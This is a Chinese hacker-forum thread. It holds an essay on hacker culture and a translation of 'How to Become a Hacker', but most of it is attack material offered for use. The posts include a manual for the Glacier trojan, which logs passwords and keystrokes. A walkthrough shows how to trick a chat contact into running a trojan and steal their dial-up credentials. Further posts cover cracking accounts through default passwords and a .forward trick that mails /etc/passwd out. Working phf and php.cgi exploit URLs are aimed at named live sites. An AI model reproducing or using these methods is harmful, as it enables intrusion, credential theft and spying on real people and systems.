  就在黑客文化日渐衰落之时,美国新闻周刊的资深记者Steven Levy完成了著名的《黑客列传》一书,书中着力介绍了一个人物:Richard M. Stallman (RMS)的故事,他是MIT人工智能实验室领袖人物,坚决反对实验室的研究成果商业化。他是商业软件社会中坚强的一员,决不随波逐流,建立了新的黑客文化。即使是这样,《黑客列传》一书还是说,Stallman可能是最终的黑客。幸而,Levy没有说对。后来,我特意为此事向Levy请教,他向我详细解释了他的说法,不论如何,黑客没有死掉。有Internet的地方,就有他们生生不息的土壤,一种全新的自由理想正在等待着。

  典型的黑客主义。如果没有GNU出现,没有划时代的人物偏执狂Stallman出现,黑客的世界也许会同朋客一样,永远的被打上失落一代的标签永远封藏,Stallman是黑客世界的黑格尔。他使黑客超越“我思故我在”的个人精神主义,把黑客“面死而在”的技术精粹主义带到人类社会,让黑客的精神划破沉闷的电脑时空的束缚,在商业社会的天空激荡起绚烂的火光。

  在一个很长的商业软件繁荣的年代,许多人认为“黑客精神已经死了!”但是后来的事实证明,只要人类互助自由的天性没有变,黑客精神就永远无尽头。虽然Linus创造了LINUX,成为继比尔盖茨之后软件世界最有影响力的软件世界灵魂人物,但是相同,如果没有Stallman理论和精神的指引,Linus思想的成果只能是黑客世界的一个传奇而已,同凯文・米克尼克没有本质的不同,更谈不上去撕破盖茨微软帝国的层层烟幕,让自由的阳光重新回阴蠡的软件世界。

  黑客自觉的意识同黑客自主的精神理论碰撞的时候,伟大的奇迹就诞生了。

  那就是反商业软件的民主王国--开放源代码世界。

 


结语:不久前听了广州一个很有名的黑客的报告,挺有感触的,他的很多观点都代表了中国现阶段黑客的观点。我们从他的身上看到新一代中国黑客的影子。这就是中国鹰派--一个另我敬佩的年轻人。pc for people,这个黑客的奋斗准则将继续延续,我们在期待,中国的黑客们……

鹰派OICQ:2056018                        鹰派主页:www.chinawill.com


B16层 发表时间: 11/10 20:19

回复: mingming8 [mingming8]   论坛用户   登录
“冰河”(2.0 正式版)使用说明

软件功能概述:

    这是一个免费软件,主要用于远程监控,具体包括: 自动跟踪屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文件及注册表、远程关机、发送信息等多种监控功能。

    服务器端监控程序启动后,首先将用户登录口令存入历史口令记录,然后启动线程不断探测口令信息,只要窗口名中包括'口令'、'密码'、'登录'等字样,监控程序就会立即记录相关的口令信息,在2.0版本中用户可以完全定制这类敏感字符。远程用户关机后口令信息将保存在历史口令文件中。

    本次改版修正了1.20版本中的一些小问题,并对部分功能进行了进一步的完善、细化和扩充,该版本在Windows 9X/NT下测试正常。


一.文件列表:

1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以先通过'G_Client'的'服务器程序配 置'功能进行一些特殊配置,例如是否将动态IP发送到指 定信箱、改变监听端口、设置访问口令等)。

2. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。


二.准备工作:

    冰河是一个基于TCP/IP协议的网络工具,所以首先应确保该协议已被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控的计算机上运行服务器端监控程序即可。


三.升级方法:

    由于这次对冰河的改版较大,所以2.0版与以前各版本完全不兼容。为此只能向老用户提供一套完全升级策略:对于1.1版本的用户,可以先用1.1版的CLIENT将2.0版本的SERVER程序上传至被监控端,然后执行'文件打开'命令即可;对于1.2版本的用户相对简单,只要通过1.2版的CLIENT远程打开2.0版的SERVER程序就可以自动升级了。


四.各模块简要说明:

    安装好服务器端监控程序后,运行客户端程序就可以对远程计算机进行监控了,客户端执行程序的各模块功能如下:

1. "添加主机": 将被监控端IP地址添加至主机列表,同时设置好访问口令及端口,设置将保存在'Operate.ini'文件中,以后不必重输。如果需要修改设置,可以重新添加该主机,或在主界面工具栏内重新输入访问口令及端口并保存设置。

2. "删除主机": 将被监控端IP地址从主机列表中删除(相关设置也将同时被清除)。

3. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'系统类命令\捕获屏幕')。

3. "冰河信使": 点对点聊天室,也就是传说中的'二人世界'。

4. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'的计算机,应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为'1'和'255')。

5. "配置服务器程序": 对'G_Server.exe'进行配置(例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)。


五.文件管理器操作说明:

文件管理器对文件操作提供了下列鼠标操作功能:

1. 文件上传:右键单击欲上传的文件,选择'复制',在目的目录中粘贴即可。也可以在目的目录中选择'文件上传自',并选定欲上传的文件。

2. 文件下载:右键单击欲下载的文件,选择'复制',在目的目录中粘贴即可。也可以在选定欲下载的文件后选择'文件下载至',并选定目的目录及文件名。

3. 打开远程或本地文件:选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开',对于可执行文件若选择了'远程打开',可以进一步设置文件的运行方式和运行参数(运行参数可为空)。

4. 删除文件或目录:选定欲删除的文件或目录,在弹出菜单中选择'删除'。

5. 新建目录:在弹出菜单中选择'新建文件夹'并输入目录名即可。

6. 文件查找:选定查找路径,在弹出菜单中选择'文件查找',并输入文件名即可(支持'*'通配符)。

7. 拷贝整个目录(只限于被监控端本机):选定源目录并复制,选定目的目录并粘贴即可。


六.命令控制台主要命令:

1. 口令类命令: 系统信息及口令、历史口令、击键记录;

2. 系统类命令: 捕获屏幕、发送信息、进程管理、窗口管理;

3. 控制类命令: 鼠标控制、系统控制、其它控制(如'锁定注册表'等);

4. 网络类命令: 创建共享、删除共享、查看网络信息;

5. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开(对于可执行文件相当于创建进程);

6. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名;

7. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、更新服务器程序。


七.使用技巧:

1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出菜单中选中'自动跟踪'项即可。

2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件;鼠标双击远程文件将先下载该文件至临时目录,然后在本地打开。

3. 在使用'网络共享创建'命令时,如果不希望其他人看到新创建的共享名,可以在共享名后加上'$'符号。自己欲浏览时只要在IE的地址栏或'开始菜单'的'运行'对话框内键入'\\'+[机器名]+[共享名(含'$'符号)]即可。

4. 在1.2以后的版本中允许用户设定捕获图像的色深(1~7级),图像将按设定保存为2的N次方种颜色(N=2的[1~7]次方),即1级为单色,2级为16色,3级为256色,依此类推。需要说明的是如果将色深设为0则表示色深依被监控端当前的分辨率而定,适当减小色深可以提高图像的传输速度。


八.常见问题:

1. 安装不成功,该问题通常是由于TCP/IP协议安装或设置不正确所致。

2. 在捕获窗口时如果选中'自动跟踪',一端时间后被监控端可能会产生系统错误。该问题是由于被监控端频频切换窗口,导致取窗口句柄时触发异常,捕获全屏时无此问题。

3. 被监控端启动时或与监控端连接时弹出'建立连接'对话框,该问题是由于系统设置了自动拨号属性。可以通过安装前定制服务器程序来禁止自动拨号。

4. '更换墙纸'命令无效,这个问题的可能性太多了,较常见的原因是被监控端的桌面设置为'按WEB页查看'。

5. 对被监控端进行文件或目录的增删操作后,少数情况不会自动刷新,可以通过[Ctrl+R]或选择弹出菜单的'刷新'命令手动刷新。

6. 开机口令不正确,因为CMOS口令是单向编码,所以编码后的口令是不可逆也是不唯一的,冰河通过穷举算出来的口令可能与原口令不符,但也是有效口令。×主席×说过没有调查就没有发言权,所以没有试过就不要妄下定论。

7. 其它问题大多是源于同时执行太多操作,导致监控端程序出错。


九.相关站点:
http://darksun1.spedia.net' http://darksun2.spedia.net'。


B17层 发表时间: 11/10 20:20

回复: mingming8 [mingming8]   论坛用户   登录
如何成为黑客

    黑客的精神态度是很重要的, 但技术则更是重要。黑客 的态度虽然是无可取代,但在梦想别的黑客 开始也叫你黑客 前, 有些基本的工具和技术是必备的。随著新科技的发明和旧技术的取代, 这些工具随时间在慢慢的改变。 例如: 以往总是会学会用机器码写程序, 直到最近我们开始使用 HTML。 不过, 在 1996 年末,下面所举的工具是很明显的被需要的:


1、 学习程序设计。

    当然, 这是基础的 hacking 技能。 在 1997 年, 理所当然的, 你必须学会 C。 但如果你只是学一种语言, 那么你不能算是一位黑客, 了不起只能算是一个程序员。 除此, 你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。 要成为一位真正的黑客, 你必须要能在几天之内将manual 内容和你目前己经知道的关连起学会一种新的语言。 也就是说, 你必会学会数个不同的语言。还了 C 之外, 你至少还要会 LISP 或 Perl (Java 也正在努力的挤上这个名单) 除了几重要的 hacking 常用语言之外,这些语言提供你一些不同的程序设计途径, 并且让你在好的方法中学习。

    程序设计是一种复杂的技术, 我没辨法在这提供完整的学习步骤。 但是我能告诉你一些在书本上和课堂上所没有的东西 (有很多, 几乎全部最好的黑客 们都是自习而来的)。 (a) 读别人的程序码, (b) 写程序, 这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言, 最好的方法是去看一些专家们所写的东西, 然后写一些你自己的东西, 然后读更多, 再写更多 。 然后一直持续, 一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事, 因为, 对菜鸟黑客 们而言, 适于供他们阅读和努力的大型程序的 source 数量很少。 但这事己有了戏剧性的变化了;现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source, 而且全都是由黑客们写成的)到处可看。 进入下一个主题。

2、 取得一个免费的 UNIX , 并学习使用和维护。

    我先假设你己经有一部个人电脑或者是可以使用任何一部 (现在的小孩子真幸福,可如此轻易的拥有 :-))。 取得黑客 技巧的第一个步骤是取得一份 Linux 或者一份免费的 BSD-Unix, 并将它安装在自己的机器, 并使之顺利的运作。没错, 在这个世界上除了 Unix 之外, 还有其它的操作系统。 但是他们只提供窗口, 你不能看到他们的程序码, 你也不能修改他们。 想要在 DOS 或 Windows或 MacOS 开始 hacking, 无疑就是要你绑著枷锁跳舞一样。

    除此之外, Unix 是 Internet 上的操作系统。 当你在不懂 Unix 的情况下学习使用Internet 时, 你没辨法在不懂 Unix 的情况下成为 Internet 的黑客。 因为这个原故, 现在的黑客 文化还是很牢固的以 Unix 为中心绕著。 (这并不完全是正确的, 而且有些活在旧时代的黑客 甚至也不喜欢这种情形, 但是 Unix 和Internet 之间的共生共成己经到了牢不可破的地步, 即使是 Microsoft 的大块肌肉也没能在上面留下明显的伤痕。)

    因些, 把 Unix 装起来吧! (我自己是喜欢 Linux, 但是还有其它的东东可用。) 学习它, 让它运作起来, 让它陪你努力精进。 用他向整个 Internet 前进。 看程序码,改程序。 有一天你成为一位高深的黑客, 你回头往后看时会发现, 你得到比Microsoft 操作系统所能提供的还要好的程序设计工具(包括 C, Lisp和 Perl)。而且得到快乐, 并学到比你想像中的还要多的知识。关于学习 Unix, 在 Loginataka 有更多的资料。(http://www.ccil.org/~esr/faqs/loginataka.html)看一下 Linux distribution 的目录或 Linux CD, 并把自己交付给它。

3、 学习使用 World Wide Web 并学会写 HTML。

    在黑客 文化创造出来的东西, 大多在他们的活动范围外被使用著, 如 在工厂和辨公室或大学被漠漠的使用著。 但 Web 是一个很大的例外, 这个黑客 眼中的大玩具甚至还被政客们接受, 并巧巧的在改变这个世界。 因此(还有很多好的理由),你必须学习 Web。并不只是学习使用 browser (这太容易了)而己, 还要学会写 HTML 这个 Web 的标签语言。 如果你不知道如何设计程序, 写 HTML 也可以给一些习惯上的帮助。嗯!! 建立 home page 吧!不过, 有一个 home page 并没任何特别之处能让你成为一位 黑客。 Web 上到处都是 home page, 而且大部份都没什么重点, 没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样, 差不多。(http://www.ccil.org/~esr/html-hell.html)为了让你的 page 有其价值, 它必须是有内容的东西 -- 它必须是有趣并且(或者)对其它黑客有用处的。

          黑客文化的状况

    就像大多数没有经济活动的文化一样, Hackerdom 的运作是建立在名望之上。 当你尝试去解决一个有趣的问题时, 你所做事是否有趣, 你的解决方案是不是真的好用, 这些只有你的技术上的同好或前辈准备好为你做评价。

    因此, 当你开始玩起黑客 的游戏时, 你的主要分数是来自其它黑客 们对你的技术的看法(这就是为什么只当其它的黑客 都认为你是黑客 时, 你才算是一位真正的黑客)。 这个事实被人们认为 hacking 是一种孤独的工作的印象所朦敝了; 也被黑客 文化的禁忌 和存在人们内心动机的自大或特权之间的冲突所朦敝。具体的说, Hackerdom 就是人类学家所说的「天才文化」。你在其中所得到的地位和名望并不来自于支配其它人, 或是因为长的漂亮, 或因为你有一些别人想要的东西, 而是因为你送出东西。 特别是, 你给送出你的时间,你的创造力和你的技术成果。下面有五种事, 你会因为做了这些事而爱到黑客 们尊敬:

1、 写免费的软件。

    第一种是写那些其它黑客 们觉的有趣或好用的程序, 并把 source 公开开放给整个 黑客 文化中的人使用。Hackerdom 最爱尊敬的是写出大而功能强的程序的人, 而且这程序是广为大家需要的,所以大家都在做用这些程序。

2、 帮忙 test 和 debug 免费的软件

    黑客们也尊敬帮忙 debug 费软件的人。 在这个不是很完美的世界, 你不可避免的必须花掉大部分的软件发展周期在 debug 阶段上。 这就是为什么在任何免费软件发展者的脑子都会告诉你一件事, 好的 beta 测试者(能很很清楚的描述发生的状况,正确的发现问题出处, 可以容忍测试版本的 bug, 并且能进行一些简单的诊断程序)和红宝石一样贵重。如果你是一只菜鸟, 试著开始去找一个你有兴趣的正在发展中的程序, 并且成为一位好的 beta 测试者。 从帮忙测试开始, 很自然的你开始帮忙 debug, 进而开始帮忙修改程序。 你将在这过程中学习到很多东西, 并,且和以后可以帮助你的人结下因果。

3、 公布有用的资讯。

    另一项好事是收集和过滤有用和有趣的资讯, 整理成 Web page 或 FAQ 之类的文件, 让大家能很容易的收得。几种主要技术 FAQ 的维护者都能得和免费软件的作者几乎一样多的尊敬。

4、 帮忙维持一些简单的工作。

    黑客 文化是由一群自愿者维持运作著。 有一些工作很无趣但却必须维持正常运作的, 如: 管理 mailing list, 维护 newsgroup, 维持大的软件供应站台, 推动RFC 和其它技术标准。做这类的事将会得到很多的尊敬, 因为大家都知道这些工作是很花时间, 但又不像玩弄程序码般有趣。

5、 为黑客文化而努力。

    最后一项, 你可以为这个文化效劳, 并推广这个文化(例如, 写一份正确的入门手册,教别人如何成为一位黑客 :-))。 在你因为做了前面四件事之一而出名之前, 这不是你该做的事。正确的说,黑客 文化并没有任何的领导者, 但在这文化有所谓的文化英雄,族群历史学家。 当你在其中混的够久之后, 你也许会成为这之中的一员。 注意:黑客 们并不相信族群, 喧骚自大的长者, 所以成为这样的长者是非常的危险。与其去和别人竞争, 你宁可为自己定位, 给自己一个亲切谱虚的身份。


  再一次的强调, 要成为黑客要了解黑客 的精神。 如果你并不玩电脑, 那么还是有一些事情可以帮助你。 这些不能成为黑客 的代替品, 不过有不少的黑客经常做这些事, 并认为这些事和 hacking 的本质有某种基本的关连。* 阅读科学小说, 并参加小说的聚会(这是一个遇到黑客 和原始黑客们的好方法)。* 学禅, 并且(或者)接触战争的艺术。 (钢铁般的纪律似乎很重要。)* 训练你的耳朵对音乐的分析能力, 试著欣赏某种特殊的音乐, 并好好的玩一些乐器或者唱歌。* 增加对于俏皮话和文字游戏的认识。* 加强你的母语写作能力。 (有很惊人数量的黑客, 都是不错的作家。 这包括一位我所知道的最好的黑客。)你做越多这些事, 那么你就愈是天生黑客 的料。


最后, 有一些事千万不要做。



* 不要使用愚蠢而夸张的代号(user ID)或化名。

* 不要加入 Usenet 的战火 (或者任何地方的)。

* 不要自称为 `cyberpunk'(电脑捣蛋玩家),也不要浪费任何时间在这么做的人身上。

* 不要 post 或 email 一些充满错字或文法错误的文章。



    做了这些事的结果只是为你招来大家的责难和批评。 黑客们的记忆力都很好, 他们会一直记住你的所做所为, 你可能要花数年的时间才有辨法让他们重新接受你。



B18层 发表时间: 11/10 20:21

回复: mingming8 [mingming8]   论坛用户   登录
入侵者的秘密

1、能用Perl(Unix下的语言,现在已经可以用于NT下)或C编程,写一些基本的安全工具, 高手们还能分析目标操作系统的源代码,找出这些系统的漏洞,从而达到攻击目的。他们还能把一些优秀的代码移植到自己用的平台上,或许还能开发一些扩展工具,扩大工具的攻击能力。甚至有些工具还提供二次开发的功能。

2、透彻地了解TCP/IP协议,至少知道Internet是如何运转的。这是最基本的。最好要了解TCP/IP协议本身如IP报文头的结构。而并不需要是电脑专业本科或硕士。

3、深入地了解至少2个以上的操作系统,其中之一无疑是Unix或者VMS。

4、有一台自己作主的电脑(不一定要工作站)和至少一个Modem(不要笑)。

5、每个月至少有60小时上Internet(我有200小时,不过我不算),光会编程是不够的,如果一个刚上internet的优秀程序员和别人打架,也许一个12岁的小孩就可以把他的启动文件改得面目全非。所以经验是很重要的,失眠也是必要的,最好的攻击时刻往往是凌晨,因为那时Internet显得不怎么拥挤。你可能因为深夜工作时常和你女朋友翻脸,也可能因为不小心而惹来一些麻烦,所以较强的心理素质和耐心也是必须具备的。

6、可能需要收集一些比较老的,过时的软件,因为这些软件也许可以帮你解决最新东西不可能解决的问题。

7、真正的入侵者喜欢攻击安全性很高的主机,攻击以前有充分的准备。运用IP欺骗是一个推荐的方法。白天一般有系统管理员在线,如果贸然进去,发现异常的他们会紧紧跟来;所以还有一点是不会直接攻击,一般远程登录到一台主机,再由这台机登录到目标。很多ISP只提供ppp,而不提供Unix shell环境,shell环境可以使很多事情变得方便,所以一个shell帐号是首先要偷的东西。

8、他们一般使用Unix,FreeBSD或者linux,也有的使用Windows NT,不要太小看微软,WindowsNT 的性能远远超过windows95,并有很多用于网络的先进工具,包括访问控制功能,可以为伙伴提供远程服务。用windows NT作为入侵平台的人正急剧增加。Telnet是一个综合性的协议,入侵者必须知道多种运用Telnet的诀窍。

9、好的入侵者都不容易上当。有的安全专家精心布置了一些陷阱,故意卖两个破绽,使得有人误以为发现了漏洞,于是他进入了该系统。实际上这个系统是另外一台机器,管理员故意发送一个口令文件给他,或者把该机器的较高权限放在入侵者推测的地方。入侵者的所有方法、一举一动,全部处于管理员的监视中,他的行为被观察者记录下来,当他要破坏时,他实际上是给安全专家提供了实验品。所以入侵者的首要任务是判定真正的目标。能够绕过专业防火墙的入侵者可以说是具备了真正意义的黑客的本领。95%的入侵者无法突破防火墙。对真实域和虚拟域的准确判断对于精明的人来说很容易弄清楚(这并不需要很深的知识)。

10、入侵者经常很忙,使他们没有太多精力去分析每个软件的漏洞,为了紧跟时代步伐,他们一般订购了漏洞、错误等邮件列表。而且会写一些脚本来分析这些邮件,找到自己需要的,阅读最新的安全文章,研究安全是个永不会终止的学习过程。

11、有条件的入侵者会自己设定一个模拟的入侵环境。比较严重的被袭往往是server配置不当, CGI程序有漏洞或者溢出引起的。入侵者在模拟环境下做一些容易犯的错误,然后就可以找到对付这些错误的方法。


B19层 发表时间: 11/10 20:22

回复: mingming8 [mingming8]   论坛用户   登录
如何得到别人的上网帐号和密码

如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
提示:先问清你的目标和你是不是在一个城市。
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
优点:没什么优点
缺点:要具体情况具体对待,太麻烦
提示:平时多多留神。
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
由于介绍此类的教学文章比较多,我就不班门弄斧了。

哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:

------------------------------

XXX,你好(XX是你在表格上填的名字)
你在XX热线的主页空间已开通
帐户名:XXX 密码:11
-----------XX热线
电话:XXXX-XXXXXXXX
------------------------------

好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
 

                          如何获得第一个帐号

我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.

确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。

如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.

以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<

还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!

很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:

帐号     密码
----------- ----------------
root    root
sys     sys/system/bin
bin     sys/bin
mountfsys  mountfsys
adm     adm
uucp    uucp
nuucp    anon
anon    anon
user    user
games    games
install   install
reboot   给 "command login" 用的
demo    demo
umountfsys umountfsys
sync     sync
admin    admin
guest    guest
daemon   daemon
________________________________________________________________

有些管理员忘记把他们改掉,那你就发财了!

另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.

只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:

.........

xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh

qingyuan:x:275:50::/usr/qingyuan:/bin/sh

hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh

smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh

kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh

brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh

tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh

............

这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.

如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.

当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.

如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.

最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.

你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.我


B20层 发表时间: 11/10 20:23

回复: mingming8 [mingming8]   论坛用户   登录
《UNIX系列系统入侵教程》之一
发布: lion 日期: 10-27 类别: 新手上路 今日/总浏览: 7/1460 
http://www.cnhonker.com  http://www.cnhonker.net
红客联盟

Lion http://www.cnhonker.com
================================================================
写于 2001/01/01

《UNIX系列系统入侵教程》之一

     ------------------ 灵活利用资源

==========================================



我的第一篇关于UNIX的教程,我想说的除了找第一个帐号外,还有一个---灵活利用资源。



你也许会感到奇怪,这个"灵活利用资源"和UNIX有什么关系啊?

是的,的确没什么很大的关系。

但这是我的经验介绍。

灵活的利用现有的资源,我们做事才能达到事半功倍的效果。



也许,你仍然不明白我的意思。

别急.跟着我来。

:)



相信大家都知道那个著名的漏洞吧:phf

漏洞描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

这是四年前的的漏洞了,我们现在还能找到他吗?

答案是:

当然可以!:)
http://www.mohall.k12.nd.us/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

这就是一个。

大家可以看看,没shadow的密码档。 不错吧。依密码档看来,这个网站不是很大。

再看一个。
http://www.grex.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

够肥的鸡吧。2395个用户,faint......

大家找个软件慢满跑,小榕的乱刀还挺不错的。

这个漏洞可以直接远程执行命令的哦,详细情况大家看《一次80端口的入侵》这篇文章。

找到用户密码后,你也可以telent或者ftp上去看看哦。

要不干脆黑了它。

呵呵

不过,我是不会干的。



大家感到奇怪吗?

都什么年代了,还有这个漏洞。

我是怎么找出来的呢?

别急

等一下告诉你。



名字:php.cgi 2.0beta10或更早版本

描述:包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者以nobody权限读取的漏洞。
http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd  /etc/security/passwd等.



这个漏洞大家也很熟悉吧,也很老了。

我们一样可以找到有这个漏洞的主机。
http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi?/etc/passwd

:)一个台湾的家伙。
http://www.pcsc.net/cgi-bin/php.cgi?/etc/passwd

不知道什么网站。
http://www.ccchubu.co.jp/cgi-bin/php.cgi?/etc/passwd

日本鬼子,他妈的,我们冲上去给他们两脚!

大家还要吗?
http://www.lifesupportal.com/cgi-bin/php.cgi?/etc/passwd
http://www.ub.fu-berlin.de/cgi-bin/php.cgi?/etc/passwd
http://www.compfutures.com/cgi-bin/php.cgi?/etc/passwd
